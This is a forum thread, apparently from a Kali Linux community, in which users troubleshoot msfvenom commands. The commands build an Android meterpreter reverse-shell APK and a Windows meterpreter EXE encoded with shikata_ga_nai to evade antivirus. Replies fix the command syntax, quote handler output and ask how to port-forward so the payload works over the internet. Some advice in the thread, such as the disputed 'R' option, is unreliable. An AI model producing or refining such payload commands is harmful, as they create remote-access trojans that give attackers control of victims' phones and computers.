Thread: MSFvenom on Kali 2.0

MSFvenom on Kali 2.0

So, I recently installed Kali 2.0 and wanted to try out msfvenom.

When I tried to install the apk on my phone this came up (The img under). Tried to install it on 2 phones and 2 tablets, same thing comes up every time.

This is the command I used to create the .apk file.

Code:
     msfvenom -p android/meterpreter/reverse_tcp LHOST=~my ip~ LPORT=4444  >Tes2t.apk

I have kali Linux 2.0 I try msfvenom for creating apk file....first of all, not proper apk
    file is created. 2nd. In property I try and checked it out the box which is said "execute the file" something this... and then I transfer the apk file on my android lava flair z1 mobile, but it cannot run properly this particular apk, its shows 00 bytes and not working.also not installed in my android CODE IS:
    msfvenom -p android/meterpreter/reverse_tcp LHOST=my default ip LPORT=4444 R > andro.apk

most probably you forgot to type R after LPORT=4444 the correct code is
    msfvenom -p android/meterpreter/reverse_tcp LHOST= YOUR IP LPORT=4444 R > TEST2T.apk
    most probably you forgot to type R.. try again in kali terminal....

but please, how do i know what port to use? i am still quite new to this

Azharudheen Guest
    i have all completed everything in terminal and is showing
    started reverse handler on 10.0.2.15:8888
    starting the payload handler

if this can be a input or help ....my OLD test:
    https://vimeo.com/134137685
    I'm a g0at

hello everyone,i have few questions about msfvenom ,i have create payload with that command : "msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.100 LPORT=448 -f exe > Desktop/payload.exe"
    than i have encode it like this : "msfvenom /root/Desktop/payload.exe -e x86/shikata_ga_nai -i 3 -a x86 --platform windows -o /root/Desktop/payload2.exe"

now will that payload work on both 64 bit and 86 bit windows or only on 86 bit??? and one more : that payload will work only on my localhost yes? to test payload in the internet i have to put not LHOST but Rhost and Rport must be portforwardet yes?

R is not mentioned in man page

Quote Originally Posted by palashtaru Dasgupta View Post
    most probably you forgot to type R after LPORT=4444 the correct code is most probably you forgot to type R.. try again in kali terminal....
    There is no option of
    Code:
    R
    mentioned in
    Code:
    msfvenom
    man page.

It is mentioned in many of the youtube videos but not mentioned anywhere in tha man page

yes type R after lhost to get the apk